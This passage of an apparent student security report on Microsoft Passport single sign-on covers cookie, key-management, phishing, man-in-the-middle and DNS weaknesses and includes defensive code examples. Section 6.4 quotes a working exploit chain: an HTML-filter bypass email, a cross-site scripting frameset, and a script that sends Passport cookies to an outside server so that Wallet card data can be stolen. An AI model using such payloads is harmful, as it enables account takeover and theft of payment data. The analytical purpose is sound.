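def handshake(bob_cert, bob_priv, trusted_ca, now, tamper=None):
    """Run the exchange with both roles in-process. Lines marked [Bob] are
    the steps Bob's side performs; everything else is Alice's side.
    Returns (accepted, plaintext); accepted is False if any check fails."""
    # Alice -> Bob: hello ; Bob -> Alice: "Hi, I'm Bob", Bob's certificate
    if bob_cert["subject"] != "Bob" or not cert_ok(bob_cert, trusted_ca, now):
        return False, None
    # Alice -> Bob: prove it ; Bob -> Alice: msg, {digest[msg]} Bob's private key
    challenge = b"Alice, This Is Bob " + secrets.token_bytes(8)   # nonce: no replay
    proof = sign(challenge, bob_priv)                              # [Bob]
    if not verify(challenge, proof, bob_cert["pub"]):
        return False, None
    # Alice -> Bob: ok Bob, here is a secret  {secret} Bob's public key
    n, e = bob_cert["pub"]
    secret = secrets.randbelow(n - 2) + 2
    wrapped = pow(secret, e, n)
    bob_key = session_key(pow(wrapped, bob_priv[1], n))            # [Bob] unwraps
    # Bob -> Alice: {some message, MAC} secret key, through Mallory if present
    record = seal(bob_key, b"some message")                        # [Bob]
    if tamper is not None:
        record = tamper(record)                                    # Mallory garbles
    msg = open_sealed(session_key(secret), record)
    return msg is not None, msg
```

Garbling one byte of the record makes `open_sealed` return None, so `handshake` reports failure, which is exactly the detection 4.3.5 describes; a certificate from an issuer Alice does not trust, or one outside its validity window, is refused before any key is exchanged. What this toy does not catch is the attack of 6.2 and 6.3, where Mallory holds a certificate that a trusted CA really issued for a look-alike name: the subject check here compares against the literal name "Bob", and a deployment must compare against the name the client meant to reach.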


5 MS Passport security weaknesses

E-commerce users need a tool that manages authentication and personal information for them, and MS Passport is such a tool: an attempt to meet that need while requiring no changes to existing browsers and servers. On the other side, the Passport protocol carries some practical risks, as follows:

5.1 Cookies problem

Cookies hold the user's encrypted credential information in the browser, and the system does not function without them. Although Passport cookies are proofs of authentication whose lifetime is normally bounded by the lifetime of the browser, they still contain sensitive data. On a public machine a user who forgets to sign out of a Passport account leaves valid authentication behind for the next person to recover.

If the user ticks the persistent-cookie option, Passport leaves the authentication on the user's machine as long-lived browser cookies. On one side, as the white paper says, "This option keeps a consumer signed in even if the consumer disconnects from the Internet, closes the browser, or turns off the computer." xvii The user need not retype the e-mail address and password, which is convenient. On the other side the option invites misuse, and the cookies can be stolen. Because the cookie is all that is needed to impersonate the user it belongs to, theft of the authentication information goes undetected, and the attacker can use the victim's Passport and Wallet without limit. On a public machine this is far more dangerous still.

Another aspect is that the concern with cookies is as much social as technological. As you browse participating sites, the Passport authentication server is in a position to record which sites you visit, and your personal information is exposed to it. This compromises user privacy, which is a serious problem.

5.2 Key management

In the Passport protocol the Passport server shares a Triple DES key with each merchant. These keys should be generated randomly and securely and then transferred out of band; physical mail or the telephone would be appropriate. In practice the keys are transferred over an SSL connection, which is a likely point of breach.

On top of that, Passport uses a single key to encrypt all the cookies it stores on users' machines, so exposure of that one key exposes every cookie. A better design would use a master key only to derive a unique key per client: encrypt the client address with the master key and use the resulting ciphertext as the encryption key for that client's cookies. The master key then serves only as a key-encryption key, and if one client's key is compromised the Passport cookies of every other client remain safe.
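Sections 4.2.2 and 5.2 describe two sides of one mechanism: a ticket cookie carrying the sign-in timestamps, checked for freshness at the login server, and the keys it is encrypted under. The following Python is an added example, not Passport's code: it issues an MSPAuth-style ticket under a key derived per client from a master key, as 5.2 proposes, verifies it, and applies the freshness test of 4.2.2. Standard library only. The master key, client addresses, PUIDs and timestamps are constructed values; HMAC-SHA256 replaces both the Triple DES cookie cipher and the "encrypt the client address" derivation step; the time_window and force_login policy knobs are assumptions about what a participating site may demand, not a description of Passport's actual parameters.

```python
import base64
import hashlib
import hmac
import json

# Constructed master key. In 5.2's design it only ever derives or wraps other
# keys; it never encrypts a cookie itself.
MASTER_KEY = bytes.fromhex("0f1e2d3c4b5a69788796a5b4c3d2e1f0" * 2)
TAG_LEN = 32


def client_key(master: bytes, client_address: str) -> bytes:
    # 5.2 derives the per-client key by encrypting the client address under
    # the master key; HMAC-SHA256 is the stdlib stand-in for that PRF step.
    return hmac.new(master, b"MSPAuth|" + client_address.encode(), hashlib.sha256).digest()


def xor_stream(key: bytes, data: bytes) -> bytes:
    # HMAC-SHA256 in counter mode, standing in for the Triple DES cookie cipher
    ks = b"".join(hmac.new(key, i.to_bytes(4, "big"), hashlib.sha256).digest()
                  for i in range(len(data) // 32 + 1))
    return bytes(a ^ b for a, b in zip(data, ks))


def issue_ticket(key: bytes, puid: str, last_manual: int, last_refresh: int,
                 saved_password: bool = False, key_version: int = 1) -> str:
    """Build an MSPAuth-style ticket: PUID, both timestamps, saved-password
    flag and key version, encrypted then MACed under the per-client key."""
    body = json.dumps({"puid": puid, "lsi": last_manual, "lr": last_refresh,
                       "sp": saved_password, "kv": key_version},
                      separators=(",", ":")).encode()
    ct = xor_stream(key, body)
    tag = hmac.new(key, ct, hashlib.sha256).digest()     # encrypt-then-MAC
    return base64.urlsafe_b64encode(ct + tag).decode()


def read_ticket(key: bytes, cookie: str):
    """Return the ticket fields, or None when the MAC fails: wrong client key,
    tampered cookie, or a cookie forged without any key."""
    try:
        raw = base64.urlsafe_b64decode(cookie)
    except (ValueError, TypeError):
        return None
    ct, tag = raw[:-TAG_LEN], raw[-TAG_LEN:]
    if len(tag) != TAG_LEN or not hmac.compare_digest(
            tag, hmac.new(key, ct, hashlib.sha256).digest()):
        return None
    return json.loads(xor_stream(key, ct))


def silent_signin(key: bytes, cookie: str, now: int, time_window: int,
                  force_login: bool = False):
    """The login server's decision in 4.2.2 when a user arrives from another
    participating site. time_window is that site's tolerance in seconds;
    with force_login it is measured from the last manual sign-in instead of
    the last refresh (assumed policy knobs, not Passport's real ones).
    Returns ("silent", refreshed_ticket) or ("reauth", reason)."""
    t = read_ticket(key, cookie)
    if t is None:
        return "reauth", "no valid ticket"
    reference = t["lsi"] if force_login else t["lr"]
    if now - reference > time_window:
        return "reauth", "ticket too old for this site"
    return "silent", issue_ticket(key, t["puid"], t["lsi"], now, t["sp"], t["kv"])


def tampered(cookie: str, index: int = 0) -> str:
    """Flip one ciphertext byte, as a client that holds a stolen cookie might."""
    raw = bytearray(base64.urlsafe_b64decode(cookie))
    raw[index] ^= 0x01
    return base64.urlsafe_b64encode(bytes(raw)).decode()
```

read_ticket refuses a cookie under any key but the one it was issued with, which is the property 5.2 wants: a leaked client key opens that client's cookies and nobody else's, and the master key never appears in a cookie. Note what the freshness check does not do: a stolen but fresh cookie passes, which is the 5.1 problem, so a site's only lever against theft is a short time_window, or force_login on sensitive actions.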

5.3 Passport server attack

In traditional Web authentication each merchant is responsible for its own customers' authentication information. In the MS Passport single sign-on system the Passport server is a central point: it stores all user data and decides on the authenticity of every user. Because all the information sits in one place, the Passport server is an extremely attractive target for attackers, and a compromise there affects every participating site at once.

5.4 Hotmail credential assignment

When users log into Hotmail they are actually running the Passport protocol, with the Hotmail server acting as a merchant. Unfortunately Hotmail has had a number of security problems, and some of them let an attacker into a user's Hotmail account without knowing the password. That is serious: because the same Passport credentials back the Hotmail account, the attacker can read all the user's information and use the user's account at the other merchants.

For example, the Internet security expert Emil Glosserman twice attacked the Hotmail and Passport systems. In the first attack he used three lines of code to get past Hotmail's filter and obtained a user's Passport ID and credit card information; in the second attack a single line of code gave the same result. Fortunately he did nothing with the user's account and reported the security hole to Microsoft.


6. Attacks on MS Passport

Because Passport stores users' credentials and wallet information, it is an attractive target, and it has had a number of security weaknesses; it has been attacked successfully several times. This section describes some particular attacks on Microsoft Passport.

6.1 Fake merchant attack

Assume users have become accustomed to Passport: they trust that the server is secure and enjoy the convenience. Take Bob and Mallory as an example, where Mallory (the malicious party) is a bogus merchant and an attacker, and Bob is a Passport user.

(1) Mallory sets up a phony Web store that sells attractive goods.

(2) Mallory obtains a certificate for a Web site called pasport.com, and builds that site with all of the text and images that appear on the real passport.com sign-in page.

(3) When Bob visits the phony store, wants to buy something and clicks Sign In, the store redirects him to Mallory's pasport.com. Bob is in the habit of filling in his e-mail address and password, so he notices neither the misspelled URL nor the site's certificate.

(4) Mallory now holds Bob's valid authentication information and can go to any online shop and use Bob's Wallet service on Bob's behalf.


6.2 Active attack

Assume Bob is a Passport user who fully trusts the Passport server, Alice is a trustworthy merchant, and Mallory is an attacker who has already gained access to the network between Bob and Alice and can rewrite packets passing between them.

(1) Bob sends a request to Alice (the merchant) and wants to communicate with her.

(2) Alice replies, telling Bob to use the login service at www.passport.com.

(3) Mallory, sitting between Bob and Alice, intercepts the packet Alice sends to Bob and rewrites the URL in the redirect to point at his fake pasport.com site.

(4) Bob visits Mallory's fake Passport site and fills in his login information. He sees no risk, because Mallory's site carries the same images as the passport.com site.

(5) The attack has now succeeded. From here on Mallory acts as a proxy between Bob and Alice, and between Bob and the Passport server.


Mallory succeeds for two reasons. First, the redirect from Alice is not protected by SSL, so it can be rewritten in transit. Second, Passport's own use of SSL connections does not help, because Mallory terminates those connections himself: he holds a valid certificate for pasport.com, so everything Bob sends is read and re-sent by the proxy. Bob therefore has no way to notice that Mallory is acting on his behalf.

6.3 DNS attack

The security of Passport depends heavily on the Domain Name System. An attacker, Mallory, who controls Bob's DNS service can simply resolve passport.com to the IP address of Mallory's own fake site. The precondition is that Mallory first obtains a certificate for a domain that is called, or looks like, passport.com, which means convincing some certification authority that he legitimately uses that name. Given the number of root certification authorities that browsers trust, the existence of one that can be deceived seems likely. The user is in the habit of filling in the e-mail address and password and does not notice the misspelled URL or check the certificate; even a user who did check the certificate might not notice the misspelling. In practice almost any URL, even one that does not resemble the word "passport", would probably work just as well, and the result is the same as in the attacks above.
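The three attacks above (6.1 to 6.3) all hinge on a sign-in redirect that points somewhere other than the genuine Passport login host: a look-alike name, a rewritten unencrypted redirect, or a host that resolves to the attacker. This Python is an added example, not anything from the report or from the Passport SDK: a check that a participating site can run on the redirect it is about to issue, or that a proxy watching for the attack of 6.2 can apply to a Location: header. The host allowlist, the registrable-domain heuristic and the edit-distance threshold are assumptions chosen for illustration. Standard library only.

```python
from urllib.parse import urlsplit

# Assumed allowlist of genuine login hosts; a real deployment pins whatever
# the Passport SDK was configured with. Comparisons are on exact host names.
GENUINE_LOGIN_HOSTS = frozenset({"passport.com", "www.passport.com", "login.passport.com"})
GENUINE_DOMAIN = "passport.com"


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to spot typosquats such as pasport.com."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_reason(host: str):
    """Why a host that is not on the allowlist still smells like passport.com,
    or None if it is simply some unrelated site."""
    labels = host.split(".")
    registrable = ".".join(labels[-2:])       # crude: last two labels
    if GENUINE_DOMAIN in host and registrable != GENUINE_DOMAIN:
        return "genuine name embedded in a foreign domain"   # login.passport.com.evil.example
    if any(label.startswith("xn--") for label in labels):
        return "punycode label, possible homograph"
    if levenshtein(registrable, GENUINE_DOMAIN) <= 2:
        return "typosquat of " + GENUINE_DOMAIN               # pasport.com
    return None


def classify_login_redirect(url: str):
    """Decide whether a Location: target that claims to be the Passport sign-in
    is acceptable. Returns ("ok", host) or ("reject", reason)."""
    p = urlsplit(url)
    host = (p.hostname or "").lower().rstrip(".")
    if p.scheme.lower() != "https":
        return "reject", "redirect not protected by SSL"      # 6.2: rewritable in transit
    if p.username is not None or p.password is not None:
        return "reject", "userinfo in URL"                    # https://passport.com@evil.example/
    if not host:
        return "reject", "no host"
    if host in GENUINE_LOGIN_HOSTS:
        return "ok", host
    reason = lookalike_reason(host)
    if reason is not None:
        return "reject", "lookalike: " + reason
    return "reject", "host not on allowlist"
```

Rejecting http: closes the rewriting in 6.2; exact host matching plus the look-alike heuristics catch 6.1's pasport.com and the passport.com@evil and passport.com.evil.example forms. The DNS attack of 6.3 is invisible to any name check, because the name is right and only the address is wrong; there the only defence is certificate validation against the name actually requested, which a name check like this does not replace.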


6.4 Cookies Attack

When you are directed to a server in the .passport.com domain and sign in to your Passport account with a user name and password, a number of cookies are set in the passport.com domain. If you are signing in to a site that uses Passport but is not itself passport.com, you are then redirected back to that site in a way that sets a further set of cookies in that site's domain. The two most important cookies are:

1. MSPSec: the cookie that authenticates you to Passport itself and implements the single sign-on feature, that is, it lets you be transparently authenticated to other sites that support Passport.

2. MSPAuth: the cookie that identifies you to the server through the 64-bit Passport Unique ID (PUID) of your account. It is set individually for each "participant domain" at login time, in addition to being set in the domain authority's own domain.

If you select "keep me logged in" when you sign in, these are persistent cookies; otherwise they are session cookies that disappear when the browser exits.

The Implementation: Passport Wallet

The Passport Wallet is a fairly simple application built on top of Passport that stores your credit card and contact information. Merchants can support it on their sites so that users can have the billing and shipping information from their wallet filled in automatically as part of "Passport Express Purchase". Because the Wallet lives in the passport.com domain, it uses the .passport.com cookies to authenticate you.

When checking out at a participating merchant, you are taken to a Passport server to select which billing and shipping information to send to the merchant. After you submit the form, Passport redirects your browser back to the merchant with the information you selected. That information is protected only by SSL on the wire; it is not encrypted with the participating site's key, so a hostile script that can act as the user can steal it easily, for the following three reasons:

1. The user may have entered the password for some other purpose, never intending it to unlock the Passport Wallet. If someone signs in to Hotmail and then reads an e-mail that uses one of a variety of attacks to steal their Passport cookies, the attacker has effectively stolen that user's Passport Wallet without the user ever knowing.

2. A "manual sign-in" does not always require the user to type the password. The "my Hotmail inbox" feature of MSN Messenger gives direct access to the Hotmail inbox; behind the scenes this behaves exactly as if the user had just entered the password, because MSN Messenger enters it on the user's behalf.

3. Cross-site scripting bugs: the various passport.com Web sites have a number of cross-site scripting vulnerabilities, and because the cookies are set for every server in the .passport.com domain, a script injected into any one of them can steal all of the cookies.


Examples:

Step One: Hotmail HTML Filtering Hole

There have been lots of holes found in Hotmail's HTML filtering in the past, and there will continue to be lots found in the future if Microsoft continues down its current flawed path of trying to code in explicit support for blocking every freak case. Obviously an exploit like this is enough to allow someone else to access your Hotmail account and do nasty things with it, but that isn't the central point here; the only reason I bother to include the Hotmail hole is that it was so quick to come up with a new exploit, and it makes it more obvious that no user interaction is required to steal the contents of the Passport Wallet. This exploit, as with everything else described in this document, is designed to be used against IE, but exploits are possible for whatever browser you want to pick that supports the features required to use Passport in the first place. If you send the following e-mail to a Hotmail account:

    From: Jennifer Sparks <[email protected]>
    To: [email protected]
    Content-Type: text/html
    Subject: Jack said I should email you...

    Hi Ted. Jack said we would really hit it off. Maybe we can get together
    for drinks sometime. Maybe this friday? Let me know.

    <BR><BR><HR>You can see the below for demonstration purposes. In a real
    exploit, you wouldn't even see it happening.<HR><BR>
    <_img foo="<IFRAME width='80%' height='400' src='http://alive.znep.com/~marcs/passport/grabit.html'></IFRAME>" >

then when the user reads it, it will load a frame with grabit.html in it, which can then continue on with Step Two. This doesn't require the execution of any JavaScript in the Hotmail message, although the hole lets you do that. Obviously, you could make it so the user doesn't see any of this going on. Hotmail thinks the "<_img" is the start of an HTML tag, so it treats the characters inside that supposed tag as attributes, etc. However, IE doesn't treat any tag starting with what it considers an invalid character as a tag at all, so it doesn't treat it as markup, and continues on to parse the IFRAME tag. Is IE wrong? You can argue about that. But if Hotmail didn't allow tags it knew nothing about, this wouldn't be a problem. In general, most current browsers have quite complex rules for parsing HTML that can behave in very unexpected ways. Allow what you know to be good and well formed; don't just filter what you think is bad. Remember, if you didn't have this Hotmail hole you could still just send a link and try to social-engineer the user into clicking on it. No part of this exploit relies on executing JavaScript in the Hotmail domain.

Step Two: Set Up a Couple of Frames


In Step One, we get the user's browser to load grabit.html. All grabit.html contains is:

    <HTML><HEAD><TITLE>Wheeeee</TITLE>
    <frameset rows="200,200">
    <FRAME NAME="me1" SRC="https://register.passport.com/ppsecure/404please">
    <FRAME NAME="me2" SRC="https://register.passport.com/reg.srf?ru=https://ww.passport.com/%22%3E%3CSCRIPT%20src='http://alive.znep.com/~marcs/passport/snarf.js'%3Ej%3C/SCRIPT%3E%3Flc%3D1033">
    </FRAMESET></HTML>

This loads two frames. The top frame is under the /ppsecure path to allow us to steal the MSPSec cookie. We don't actually have to do this for this exploit, but I'm throwing this in just to show how trivial it is. The page doesn't exist, but that doesn't change anything. The bottom frame exploits one of the passport.com cross-site scripting holes: reg.srf, if you are logged in, ends up loading a page saying you are already logged in that includes the ru parameter without properly encoding it. At that point snarf.js executes to actually steal the cookies.

Step Three: Stealing the Cookies

Now snarf.js is being executed in the security context of a page with a URL of http://register.passport.com/alreadysignedin.srf. The contents of snarf.js are quite simple:

    s = new String(document.URL);
    if (s.indexOf('http:') == 0) {
        setTimeout('document.location="https:" + s.substring(5, s.length-1, 1000)');
    } else {
        document.location="http://alive.znep.com/~marcs/passport/snarf.cgi?cookies=" + escape(parent.frames[0].document.cookie);
    }

The only trick is that alreadysignedin.srf ends up being loaded as a non-SSL page, which is no good, since the scripting security model then stops us accessing the SSL upper frame to grab the SSL-only MSPSec cookie. So that's no problem: we just reload the same page using SSL, at which point our code executes again and sends the cookies from the upper frame off to a CGI script that just captures them to a log.

Part Four: So we have the cookies...

Congratulations, you have successfully stolen some cookies. You can then automate the rest of the stealing of the Passport Wallet however you want. The easy way for demonstrations is to just copy the cookies into a Netscape cookies file and go from there. The easiest way to actually get the full credit card numbers, etc. is to go to a Passport Express Purchase enabled store and go through the checkout; many or most stores will then show you all the information as part of the order page. I'm sure you can figure out the other ways to automate it or grab it without actually involving any merchant's site. Hint: the information is sent to the browser as part of a form that automatically posts back to the merchant site using ECML.


7. Advantages of Passport

Although, as we have seen, Passport carries many risks, why do we still like to use it? Because we are ordinary users, and it benefits us.

Ease of use. Users sign in once and get authenticated access to every server they are authorized for, without being interrupted by repeated password prompts. The number of passwords a user must remember drops to one, so forgetting it becomes far less likely.

Password limited to the sign-in server. To sign in, the user types a single password, and only the Passport sign-in server (over SSL) ever sees it. Participating sites receive an encrypted ticket, never the password.

Simplified management. Participating sites no longer maintain their own user-name and password databases; access is granted on the strength of the Passport ticket, and the site keeps only the Passport site ID and key it was issued, which change far less often than a user list.


8. Business use (MS Passport)

8.1 Business use of Passport

Single sign-in. Users create a single set of credentials that can be used to access any site that supports the Passport service. This increases customer satisfaction by giving site visitors easy access without the frustration of repetitive registrations and forgotten passwords.

Kids Passport. The Kids Passport service offers tools that help businesses comply with the parental-consent provisions of children's privacy laws such as the U.S. Children's Online Privacy Protection Act (COPPA). Parents can use Kids Passport to modify their children's Passport profile information and to choose the consent level at which participating Kids Passport sites collect, use and share children's personal information.

8.2 Business Benefits of Passport

Passport offers several business benefits.

Save the time and money required to build authentication systems. Passport reduces the need to build, host and maintain authentication systems, letting a company focus its development resources on value-added features that drive the business. Passport also offers localization in more than 25 languages, which may decrease total costs further, and fewer forgotten passwords reduce customer-support expenses.

Offer 200 million Passport users easy access to your site. Passport simplifies sign-in and registration, lowering the barrier for its 200 million account holders to reach your Web site. Easy access without the burden of repetitive registrations and forgotten passwords helps increase customer reach and satisfaction.

Increase customer loyalty with easy, dependable personalization. Passport lets you personalize the Web experience of returning customers based on their profiles. Personalized customization builds closer, more meaningful relationships with customers and increases loyalty.

Maintain your branding with flexible customization. With Passport you can tailor sign-in pages to match your site design, giving customers a seamless experience.

Maintain ownership and control of your customer data. Passport has no access to or visibility of your data; it is simply a technology that helps you offer authenticated, user-centric services to your customers. The relationship between your company and your customers belongs solely to you.


9. About the Liberty Alliance

"The Liberty Alliance Project is an alliance of more than 150 companies, non-profit and government organizations from around the globe. The consortium is committed to developing an open standard for federated network identity that supports all current and emerging network devices. Federated identity offers businesses, governments, employees and consumers a more convenient and secure way to control identity information in today's digital economy, and is a key component in driving the use of e-commerce, personalized data services, as well as web-based services. Membership is open to all commercial and non-commercial organizations." xviii

Liberty Alliance and Passport are both aimed primarily at consumers, and it will be a while before consumers make significant use of Web services. Unlike Passport, Liberty neither defines a central authentication authority nor asks the users of cooperating domains to migrate to one. Instead, one-to-many or many-to-many federation relationships can be formed between an authentication authority (identity provider) and cooperating domains, and likewise between authentication authorities themselves.

The Liberty Alliance is pushing forward with its vision of open single sign-on, which its officials describe as a federated solution. The plan is for personal information to be controlled completely by the user, yet shareable securely with the organizations the user chooses, so as to avoid attacks, toll booths and other impediments to interoperability or service delivery.

Liberty version 1.0 is a very flexible specification for an authentication system, built up from web redirection, web services, metadata and schemas. In theory the number of organizations in an alliance can grow without bound. But because the organizational model is loosely coupled, it brings problems for the flexibility of the system and for the management of authentication relationships, and the efficiency of authentication still has to be tested as the alliance spreads.

Reference

i. www.cafesoft.com/support/security/glossary.html
ii. http://searchsecurity.techtarget.com/sDefinition/0,,sid14_gci340859,00.html
iii. http://searchsecurity.techtarget.com/sDefinition/0,,sid14_gci340859,00.html
iv. "Comparing Password Synchronization with Protocom SecureLogin® Single Sign-on", white paper, Protocom Development Systems, October 1, 2004, http://www.bitpipe.com/detail/RES/1098809756_442.html?src=google
v. http://java.sun.com/features/2002/05/single-signon.html
vi. www.zeroonesoftware.com/glossary.html
vii. http://www.oasis-open.org/committees/security/
viii. Executive overview documentation, http://www.oasis-open.org/committees/tc_home.php?wg_abbrev=security
ix. Executive overview documentation, http://www.oasis-open.org/committees/tc_home.php?wg_abbrev=security
x. Executive overview documentation, http://www.oasis-open.org/committees/tc_home.php?wg_abbrev=security
xii. Microsoft .NET Passport Review Guide, Microsoft, Jan. 2004
xiii. Luis von Ahn, "Telling Humans and Computers Apart Automatically", Feb. 2004
xv. Microsoft .NET Passport Review Guide, Microsoft, Jan. 2004
xvi. "XADM: How Secure Sockets Layer Works", Microsoft.com, Nov. 2004
xvii. Passport white paper
xviii. http://searchsecurity.techtarget.com/sDefinition/0,,sid14_gci340859,00.html
xix. http://www.projectliberty.org/about/index.php
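As an added example (not code from this paper or from the Liberty Alliance) of the many-to-many federation relationships described above, the following Python models two identity providers and two service providers, each service provider keeping its own trust metadata and no central authority existing. Liberty and SAML assertions carry XML digital signatures; here an HMAC-SHA256 over a JSON payload stands in for that signature, and all provider names, keys and users are constructed for the example.

```python
"""Federated SSO trust without a central authority (added example).

Each service provider (SP) decides for itself which identity providers (IdPs)
it trusts and holds their verification keys as metadata.  An assertion is
accepted only if it is signed by a trusted IdP, is addressed to this SP, has
not expired and has not been presented before.  HMAC-SHA256 stands in for the
XML signatures used by Liberty/SAML; that substitution is an assumption here.
"""
import base64
import hashlib
import hmac
import json
import secrets
import time


def _b64(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).decode().rstrip("=")


def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


class IdentityProvider:
    """Authenticates users and issues signed assertions for one audience."""

    def __init__(self, name: str, key: bytes):
        self.name = name
        self.key = key

    def issue_assertion(self, subject: str, audience: str, ttl: int = 300, now=None) -> str:
        now = time.time() if now is None else now
        payload = {
            "id": secrets.token_hex(8),   # unique per assertion, used for replay detection
            "issuer": self.name,
            "subject": subject,
            "audience": audience,         # the one SP this assertion is meant for
            "exp": now + ttl,
        }
        body = _b64(json.dumps(payload, sort_keys=True).encode())
        sig = _b64(hmac.new(self.key, body.encode(), hashlib.sha256).digest())
        return f"{body}.{sig}"


class ServiceProvider:
    """Accepts assertions only from IdPs listed in its own trust metadata."""

    def __init__(self, name: str, trusted_idps: dict):
        self.name = name
        self.trusted_idps = dict(trusted_idps)  # IdP name -> verification key (metadata)
        self.seen_ids = set()

    def verify(self, token: str, now=None):
        """Return (True, subject) or (False, reason)."""
        now = time.time() if now is None else now
        try:
            body, sig = token.split(".")
            payload = json.loads(_unb64(body))
        except ValueError:                       # covers bad base64, bad JSON, bad split
            return (False, "malformed")
        if not isinstance(payload, dict):
            return (False, "malformed")
        key = self.trusted_idps.get(payload.get("issuer"))
        if key is None:                          # issuer not in this SP's metadata
            return (False, "untrusted issuer")
        expected = _b64(hmac.new(key, body.encode(), hashlib.sha256).digest())
        if not hmac.compare_digest(expected, sig):
            return (False, "bad signature")
        if payload.get("audience") != self.name:  # assertion addressed to another SP
            return (False, "wrong audience")
        if payload.get("exp", 0) <= now:
            return (False, "expired")
        if payload["id"] in self.seen_ids:
            return (False, "replayed")
        self.seen_ids.add(payload["id"])
        return (True, payload["subject"])


def demo() -> dict:
    """Constructed federation: two IdPs, two SPs, many-to-many trust."""
    key_a, key_b = b"constructed-key-of-idp-a", b"constructed-key-of-idp-b"
    idp_a = IdentityProvider("idp-a", key_a)
    idp_b = IdentityProvider("idp-b", key_b)
    rogue = IdentityProvider("idp-a", b"rogue-key")  # claims to be idp-a without its key
    shop = ServiceProvider("shop", {"idp-a": key_a, "idp-b": key_b})  # trusts both IdPs
    bank = ServiceProvider("bank", {"idp-a": key_a})                   # trusts only idp-a

    results = {}
    token = idp_a.issue_assertion("alice", "shop")
    results["shop accepts idp-a"] = shop.verify(token)
    results["replay rejected"] = shop.verify(token)
    results["bank accepts idp-a"] = bank.verify(idp_a.issue_assertion("alice", "bank"))
    results["bank rejects idp-b"] = bank.verify(idp_b.issue_assertion("alice", "bank"))
    results["shop rejects assertion for bank"] = shop.verify(idp_a.issue_assertion("alice", "bank"))
    results["forged issuer rejected"] = shop.verify(rogue.issue_assertion("alice", "shop"))
    results["expired rejected"] = shop.verify(idp_a.issue_assertion("alice", "shop", ttl=-1))
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```

The point of the example is that trust is a property of each SP's metadata, not of a central server: adding a new IdP to the federation means distributing its key to the SPs that choose to trust it, and the same assertion is accepted by one SP and refused by another purely on that basis. The audience, expiry and replay checks are what keep an assertion issued for one domain from being reused in another.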


10. Conclusion

Password management can be a complex and frustrating task for end users, resulting in compromised security and lost productivity. Single sign-on lets users log in quickly and securely to all their applications, websites and mainframe sessions with a single identity. It solves the password management problem by removing the need for users to remember a myriad of usernames and passwords beyond their initial network login. The same property cuts the other way: one credential now unlocks every connected service, so the strength of that credential and the protection of the sign-on server and its cookies matter more than before.

Of all the single sign-on systems we focused mainly on .NET Passport, as it is the most popular and widespread one today. Most of us have MSN accounts, but not all of us know how Passport actually works, and that is the main reason we chose this topic. Although Passport has security weaknesses, such as the cookie problems, key management, attacks on the Passport server and Hotmail credential assignment, and can easily be attacked if too little care is taken to protect it, it is still widely used. The benefits of Passport, as shown above, are also obvious, both for the single user and for business.

Liberty Alliance aims at cooperating corporations rather than at individuals served through a single vendor, in contrast with Microsoft Passport. We look forward to the cooperation and competition between the Liberty Alliance and Microsoft, which may promote the progress of single sign-on systems.


Bibliography

[1] Microsoft .NET Passport Review Guide, Microsoft.com, Jan. 2004
[2] Luis von Ahn, Telling Humans and Computers Apart Automatically, Feb. 2004
[3] Luis von Ahn, CAPTCHA: Using Hard AI Problems for Security
[4] XADM: How Secure Sockets Layer Works, Microsoft.com, Nov. 2004
[5] SSL (Secure Sockets Layer), http://www.nwfusion.com/details/473.html?def
[6] David and Aviel, Risk of the Passport Single Signon Protocol, AT&T Labs

xi. Microsoft .NET Passport Review Guide, Microsoft, Jan. 2004
xiv. Microsoft .NET Passport Review Guide, Microsoft, Jan. 2004
